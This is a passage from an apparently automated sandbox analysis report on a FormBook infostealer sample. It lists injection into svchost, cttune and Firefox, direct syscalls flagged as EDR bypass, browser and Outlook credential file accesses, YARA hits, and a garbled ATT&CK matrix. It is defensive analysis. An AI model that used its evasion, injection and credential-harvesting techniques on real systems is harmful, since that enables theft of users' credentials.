                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03428918 mov eax, dword ptr fs:[00000030h]7_2_03428918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03428918 mov eax, dword ptr fs:[00000030h]7_2_03428918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B892A mov eax, dword ptr fs:[00000030h]7_2_034B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034C892B mov eax, dword ptr fs:[00000030h]7_2_034C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034C69C0 mov eax, dword ptr fs:[00000030h]7_2_034C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343A9D0 mov eax, dword ptr fs:[00000030h]7_2_0343A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343A9D0 mov eax, dword ptr fs:[00000030h]7_2_0343A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343A9D0 mov eax, dword ptr fs:[00000030h]7_2_0343A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343A9D0 mov eax, dword ptr fs:[00000030h]7_2_0343A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343A9D0 mov eax, dword ptr fs:[00000030h]7_2_0343A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343A9D0 mov eax, dword ptr fs:[00000030h]7_2_0343A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034649D0 mov eax, dword ptr fs:[00000030h]7_2_034649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034FA9D3 mov eax, dword ptr fs:[00000030h]7_2_034FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034BE9E0 mov eax, dword ptr fs:[00000030h]7_2_034BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034629F9 mov eax, dword ptr fs:[00000030h]7_2_034629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034629F9 mov eax, dword ptr fs:[00000030h]7_2_034629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034429A0 mov eax, dword ptr fs:[00000030h]7_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034429A0 mov eax, dword ptr fs:[00000030h]7_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034429A0 mov eax, dword ptr fs:[00000030h]7_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034429A0 mov eax, dword ptr fs:[00000030h]7_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034429A0 mov eax, dword ptr fs:[00000030h]7_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034429A0 mov eax, dword ptr fs:[00000030h]7_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034429A0 mov eax, dword ptr fs:[00000030h]7_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034429A0 mov eax, dword ptr fs:[00000030h]7_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034429A0 mov eax, dword ptr fs:[00000030h]7_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034429A0 mov eax, dword ptr fs:[00000030h]7_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034429A0 mov eax, dword ptr fs:[00000030h]7_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034429A0 mov eax, dword ptr fs:[00000030h]7_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034429A0 mov eax, dword ptr fs:[00000030h]7_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034309AD mov eax, dword ptr fs:[00000030h]7_2_034309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034309AD mov eax, dword ptr fs:[00000030h]7_2_034309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B89B3 mov esi, dword ptr fs:[00000030h]7_2_034B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B89B3 mov eax, dword ptr fs:[00000030h]7_2_034B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B89B3 mov eax, dword ptr fs:[00000030h]7_2_034B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03442840 mov ecx, dword ptr fs:[00000030h]7_2_03442840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03460854 mov eax, dword ptr fs:[00000030h]7_2_03460854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03434859 mov eax, dword ptr fs:[00000030h]7_2_03434859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03434859 mov eax, dword ptr fs:[00000030h]7_2_03434859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034BE872 mov eax, dword ptr fs:[00000030h]7_2_034BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034BE872 mov eax, dword ptr fs:[00000030h]7_2_034BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034C6870 mov eax, dword ptr fs:[00000030h]7_2_034C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034C6870 mov eax, dword ptr fs:[00000030h]7_2_034C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034BC810 mov eax, dword ptr fs:[00000030h]7_2_034BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03452835 mov eax, dword ptr fs:[00000030h]7_2_03452835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03452835 mov eax, dword ptr fs:[00000030h]7_2_03452835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03452835 mov eax, dword ptr fs:[00000030h]7_2_03452835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03452835 mov ecx, dword ptr fs:[00000030h]7_2_03452835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03452835 mov eax, dword ptr fs:[00000030h]7_2_03452835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03452835 mov eax, dword ptr fs:[00000030h]7_2_03452835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346A830 mov eax, dword ptr fs:[00000030h]7_2_0346A830
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C180A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,5_2_00C180A9
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BEA124 SetUnhandledExceptionFilter,5_2_00BEA124
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BEA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00BEA155

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeNtOpenKeyEx: Direct from: 0x77672B9CJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeNtProtectVirtualMemory: Direct from: 0x77672F9CJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeNtCreateFile: Direct from: 0x77672FECJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeNtOpenFile: Direct from: 0x77672DCCJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeNtTerminateThread: Direct from: 0x77672FCCJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeNtQueryInformationToken: Direct from: 0x77672CACJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeNtAllocateVirtualMemory: Direct from: 0x77672BECJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeNtDeviceIoControlFile: Direct from: 0x77672AECJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeNtQuerySystemInformation: Direct from: 0x776748CCJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeNtQueryAttributesFile: Direct from: 0x77672E6CJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeNtSetInformationThread: Direct from: 0x77672B4CJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeNtOpenSection: Direct from: 0x77672E0CJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeNtQueryVolumeInformationFile: Direct from: 0x77672F2CJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeNtAllocateVirtualMemory: Direct from: 0x776748ECJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeNtSetInformationThread: Direct from: 0x776663F9Jump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeNtReadVirtualMemory: Direct from: 0x77672E8CJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeNtCreateKey: Direct from: 0x77672C6CJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeNtClose: Direct from: 0x77672B6C
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeNtWriteVirtualMemory: Direct from: 0x7767490CJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeNtAllocateVirtualMemory: Direct from: 0x77673C9CJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeNtDelayExecution: Direct from: 0x77672DDCJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeNtCreateUserProcess: Direct from: 0x7767371CJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeNtQuerySystemInformation: Direct from: 0x77672DFCJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeNtQueryInformationProcess: Direct from: 0x77672C26Jump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeNtResumeThread: Direct from: 0x77672FBCJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeNtReadFile: Direct from: 0x77672ADCJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeNtAllocateVirtualMemory: Direct from: 0x77672BFCJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeNtResumeThread: Direct from: 0x776736ACJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeNtSetInformationProcess: Direct from: 0x77672C5CJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeNtMapViewOfSection: Direct from: 0x77672D1CJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeNtNotifyChangeKey: Direct from: 0x77673C2CJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeNtWriteVirtualMemory: Direct from: 0x77672E3CJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeNtCreateMutant: Direct from: 0x776735CCJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\new.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\cttune.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: NULL target: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: NULL target: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\cttune.exeThread register set: target process: 6972Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\cttune.exeThread APC queued: target process: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\new.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 8C5008Jump to behavior
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C187B1 LogonUserW,5_2_00C187B1
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BC3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,5_2_00BC3B3A
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BC48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_00BC48D7
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C24C53 mouse_event,5_2_00C24C53
                Source: C:\Users\user\Desktop\new.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\new.exe"Jump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeProcess created: C:\Windows\SysWOW64\cttune.exe "C:\Windows\SysWOW64\cttune.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C17CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,5_2_00C17CAF
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C1874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,5_2_00C1874B
                Source: new.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: new.exe, lxdvPfMVsD.exe, 00000009.00000000.1792727218.00000000017D1000.00000002.00000001.00040000.00000000.sdmp, lxdvPfMVsD.exe, 00000009.00000002.2532309667.00000000017D1000.00000002.00000001.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000000.1961582023.0000000001640000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: lxdvPfMVsD.exe, 00000009.00000000.1792727218.00000000017D1000.00000002.00000001.00040000.00000000.sdmp, lxdvPfMVsD.exe, 00000009.00000002.2532309667.00000000017D1000.00000002.00000001.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000000.1961582023.0000000001640000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: lxdvPfMVsD.exe, 00000009.00000000.1792727218.00000000017D1000.00000002.00000001.00040000.00000000.sdmp, lxdvPfMVsD.exe, 00000009.00000002.2532309667.00000000017D1000.00000002.00000001.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000000.1961582023.0000000001640000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Manager
                Source: lxdvPfMVsD.exe, 00000009.00000000.1792727218.00000000017D1000.00000002.00000001.00040000.00000000.sdmp, lxdvPfMVsD.exe, 00000009.00000002.2532309667.00000000017D1000.00000002.00000001.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000000.1961582023.0000000001640000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BE862B cpuid 5_2_00BE862B
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BF4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_00BF4E87
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C01E06 GetUserNameW,5_2_00C01E06
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BF3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,5_2_00BF3F3A
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BC49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,5_2_00BC49A0

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.2535533484.0000000005400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2533835730.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1897811815.0000000007850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2533575753.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2533155385.0000000004350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1893344480.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1894505430.0000000004BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2530076362.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\cttune.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\cttune.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: new.exeBinary or memory string: WIN_81
                Source: new.exeBinary or memory string: WIN_XP
                Source: new.exeBinary or memory string: WIN_XPe
                Source: new.exeBinary or memory string: WIN_VISTA
                Source: new.exeBinary or memory string: WIN_7
                Source: new.exeBinary or memory string: WIN_8
                Source: new.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.2535533484.0000000005400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2533835730.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1897811815.0000000007850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2533575753.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2533155385.0000000004350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1893344480.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1894505430.0000000004BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2530076362.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C36283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,5_2_00C36283
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C36747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,5_2_00C36747
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BF7AA1 RpcBindingSetOption,_LocaleUpdate::_LocaleUpdate,_memset,WideCharToMultiByte,GetLastError,_memset,5_2_00BF7AA1

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		2
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		2
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets151
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

